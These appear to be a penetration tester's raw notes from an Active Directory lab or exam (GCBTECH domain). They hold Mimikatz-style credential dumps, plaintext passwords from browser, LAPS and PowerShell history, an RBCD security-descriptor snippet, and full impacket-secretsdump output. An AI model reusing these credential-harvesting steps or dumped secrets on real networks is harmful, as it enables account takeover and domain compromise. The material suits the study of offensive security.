* Username : appmanager
* Domain : IT
* NTLM : 2c5d4678b83e5de26dc0338a0fcf6245
* SHA1 : 18cb4d7cb7e5aa891ef9f4f44c846a491999ede4
* DPAPI : cc49271d0c4e173c4acdabba341b7e69
Got creds from Edge
UserName     Resource                 Password
--------     --------                 --------
root         <http://192.168.4.111/>  BugTrackerL0g1n
itemployees  <http://192.168.4.111/>  ReadOnlyAccess
LAPS on IT-APPSRV01
username: Administrator
password: (4E01+)$-L[3m9

Got sqlsvc hash from keytab file.
username: sqlsvc
hash: 7782d820e5e5952b20b77a2240a03bbc

I’m Cooked No waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaay
Found creds in PowerShell history
powershell -ep bypass $passwd = ConvertTo-SecureString "Vend0r'sDatabaseSecret"-AsPlainText -Force
powershell -ep bypass $passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force

Set-DnsClientServerAddress -InterfaceAlias "Ethernet" -ServerAddresses "192.168.4.2", "192.168.250.1"
examuser
Id70+#1C+;33{/
[00000003] Primary
* Username : techadmin
* Domain : GCBTECH
* NTLM : 85fea8c3730ce6ccce8c52c58854ed8e
* SHA1 : bad0edffa3c5ad6be639ae224ed5f5aee6e261c1
* DPAPI : 9aaaa1e7720c6d06a40fcce718035daf
Fake01 SID
S-1-5-21-1265556501-975517518-3548124796-8101
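# Build a security descriptor from SDDL: owner BA (Builtin Administrators), DACL with one allow ACE for the Fake01 SID above
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1265556501-975517518-3548124796-8101)"
# Serialize the descriptor to its binary form in $SDBytes
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)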
msv :
[00000003] Primary
* Username : sqladmin
* Domain : GCBTECH
* NTLM : 41eb70e78aef6778c507773770fcf780
* SHA1 : 1e476b9e69778cafca7a4c45dd44b147438ae0ac
* DPAPI : 914d7e0c9c9d4a9a9d19473d7a9fa6ab
tspkg :
wdigest :
* Username : sqladmin
* Domain : GCBTECH
* Password : (null)
kerberos :
* Username : sqladmin
* Domain : GCBTECH.LOCAL
* Password : P@ssforDBServer1
┌──(remo㉿Remo)-[~/Server]
└─$ impacket-secretsdump gcbtech.local/'sqladmin':'P@ssforDBServer1'@172.16.11.4
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x98a06e754f0c627c1466a1c3ca55431f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:40927ede7a0c75c55acad0699d36712d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:65c30c7139b564de8357dd82e2e97e40:::
[*] Dumping cached domain logon information (domain/username:hash)
GCBTECH.LOCAL/sqladmin:$DCC2$10240#sqladmin#5a34bb39bce9d48b2bfb84bfbe9792e9: (2025-05-10 10:23:03)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
GCBTECH\\GCBTECH-SQL$:aes256-cts-hmac-sha1-96:8ded49b2b4e2d180cfaf1db70b281d7fde3c80dd0a7dd89ee9e4bf7ad1baefed
GCBTECH\\GCBTECH-SQL$:aes128-cts-hmac-sha1-96:5ba855f66c5b84d2fcbbb3ddd24408d4
GCBTECH\\GCBTECH-SQL$:des-cbc-md5:9b3475499ddf6749
GCBTECH\\GCBTECH-SQL$:plain_password_hex:08dc010253bad3bdbe26bb9484e11fd1769db29ade7b2ba98042f9cb485ab5da6d5f7e1aaf0621044a6f93c65f9b83c3c56eba79285689dd275d6e106e9ac480cf130b4315f236242921ccd8b6f162b5ba3a3d29cea344ac25f529de07ed9b60d6bbf636a91321a1a8f5a0888d97beaa762d1ec882cc40c9a201b783ca17690ea1dfe8dab0873151bdc353c829564582ca86211345ca0290839f120ac31343a2f064e880f97609e2b29483b7aa06ef83004f227b23ee724f8bb791882bbbdd4c146432c7210138627b31c6dce701570af84c811f7f7d5c00feba5bea252e97142cd48fb9be44180dc822ceb7883285d6
GCBTECH\\GCBTECH-SQL$:aad3b435b51404eeaad3b435b51404ee:8db46467a82fada77d7140a23689b1bb:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f0e5b87f833bca8a56e5e1e2f89a05b5755808b
dpapi_userkey:0xa6acb9962392c033ca079ba74b32474e6a6531f8
[*] NL$KM
[*] Cleaning up...
[*] Stopping service RemoteRegistry